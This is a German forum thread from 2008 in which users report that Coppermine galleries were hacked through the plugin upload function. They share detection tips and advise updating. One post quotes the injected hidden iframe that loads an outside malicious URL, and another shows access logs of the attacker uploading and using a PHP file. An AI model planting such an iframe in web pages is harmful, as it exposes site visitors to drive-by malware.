Hiho,
heute morgen hatte ich eine etwas unerfreuliche mail von Kerstin in meinem Postfach, Antivir fand mit der Heuristik (mein NOD blieb still :evil:) ein Problem in meiner Coppermine-Galerie => html/infected.webpage.gen.

Wie sich herausgestellt hat, wurde in drei PHP-Seiten (und das beunruhigt mich dann doch :shock:) ein Iframe an den Anfang gesetzt.

<iframe style="display: none" src="http://caatadgouk.com/dl/adv436.php" width="1" height="1"></iframe>

Diese Art von Hack scheint was ganz frisches zu sein, ich kann mir absolut nicht erklären wo der herkommt.

Siehe dazu auch den Thread im Coppermine-Forum.

http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

Also, Leute die Coppermine haben sollten mal schauen...

Edit: ne neue Version von Coppermine soll das Problem beseitigen. Hilft aber nicht, wenn es schon passiert ist :roll:
Trotzdem, man sollte unbedingt updaten, vor allem wenn man bisher verschont wurde!
http://forum.coppermine-gallery.net/index.php/topic,51787.0.html

Viele Grüße
Andreas

Hallo Andreas,

vielen Dank für die Info - dann werde ich mal updaten. Wie merke ich, dass die Galerie bereits befallen ist? Beim Besuch bekomme ich von meinem Antivirusprogramm keine Fehlermeldungen.

Ich lade mal sämtliche PHP-Files vom Server runter und vergleiche sie mit den Original-Installationsdateien. Dann müsste ich merken, ob was geändert wurde.

Lg. Josef

Hallo Josef,
im Quellcode der generierten Seite schauen, ob da irgendwo ein ominöses Iframe auftaucht.

Bei mir (und den anderen wohl auch) ist folgendes passiert:

Heute Nacht ein Angriff, bei dem über eine Lücke im Upload-Teil der CPG eine Datei ins Plugin-Verzeichnis geladen wurde. (es gab auch Fälle in denen php-Dateien als zip/jpg ins Album Verzeichnis gepackt wurden)

91.78.72.131 - - [13/Apr/2008:16:19:45 +0200] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 24245 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:46 +0200] "GET /pluginmgr.php HTTP/1.1" 200 24217 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:47 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/pluginmgr.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:56 +0200] "GET /plugins/zacosmall.php HTTP/1.1" 200 5047 "-" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:57 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:19:59 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 26145 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:00 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:07 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 19002 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:07 +0200] "GET /favicon.ico HTTP/1.1" 200 3638 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"
91.78.72.131 - - [13/Apr/2008:16:20:12 +0200] "POST /plugins/zacosmall.php HTTP/1.1" 200 2037 "http://galerie.makrograf.com/plugins/zacosmall.php" "Opera/9.50 (Windows NT 6.0; U; en)"

Dieses zacosmall.php hat dann wohl die Dateien verändert. Zum Glück bei mir nur drei Stück, der Rest meines Webspaces scheint unberührt...

Logs durchstöbern und nach der upload-Funktion suchen hat bei mir den Zugriff gezeigt.

Da bei mir auch Coppermine läuft, welche Version hast du?

Ich hatte die 1.4.16, also die bis dato neuste.
Eben auf die 1.4.17 upgedatet... läuft wieder, bis jetzt noch nicht neu gehackt, mal abwarten ;)

ätz, werd ich wohl auch machen müssen.... da werd ich mir beim bridgen ja wieder die finger brechen

Na ja Black,
besser jetzt, als wenn es zu spät ist :?
Bei mir hatte der Schadenscode zum Glück nur drei PHP-Dateien verändert, was man so liest, sind mitunter ganze Webserver betroffen und in allen PHP/HTML-Dateien steht dieser Ifram-Mist.

Viel Spaß :D

Danke für die Info, ich hab nun einfach mal ne alte, brachliegende Coppermine Galerie die ich noch auf ner subdomain hatte entsorgt. Was es nicht gibt braucht nicht gepflegt und geupdated zu werden, kann dafür aber auch nicht gehackt werden. ;) :top:

Heute wurde noch einmal eine Bugfix-Version 1.4.18 nachgelegt. Ich muss gestehen, dass ich mit dem Aktualisieren etwas nachlässig war und noch bis heute 1.4.14 verwendet habe. Werde jetzt aber regelmäßig updaten ...

Lg. Josef

1.4.18 habe ich heute über die 1.4.16 drübergebügelt. Läuft ohne Probleme :top:

See ya, Maic.

Huch, ich bin ja voellig hinterher was die Coppermine Version angeht. Vllt. hat mich das bewahrt. Werde das Update jetzt mal fix nachholen, danke für die Infos!

(Es hat nicht schon jemand auch das stramm modpack getestet?)

Nachdem vor einer Woche Bärlichkeit mit dem Hinweis auf die cpg 1.4.17 kam (alte 1.4.16 hackbar über die upload routine)
Nun von mir der Hinweis auf die 1.4.18, wo eine weitere Möglichkeit einer sql injection gefixed wurde.

Hinwiese zum einem Update und Downloadmöglichkeit Hier (http://forum.coppermine-gallery.net/index.php/topic,51882.0.html)

Da ja einige hier eine CPG betreiben vielleicht mal anschauen.

(Update ist übrigens problemlos, selbst die gebridgde Coppermine 1.4.18 in Joomla auf meiner HP läuft sauber)

Black

danke für den Hinweis:top::top:

Gruß
Andreas

Siehe den Thread -> CPG hacked (http://www.sonyuserforum.de/forum/showthread.php?p=642910#post642910) ab Posting #9.

Dort ging es schon um CPG 1.4.18. So könnte man doch eigentlich der Übersichtlichkeit wegen, diesen Thread einfach drüben unten ankleben ;)

See ya, Maic.

Upps, sorry, stimmt.. ich hatte nur den Ursprungsthreat im Kopf gehabt.... und war halt eine Woche beruflich ohne Netz

Black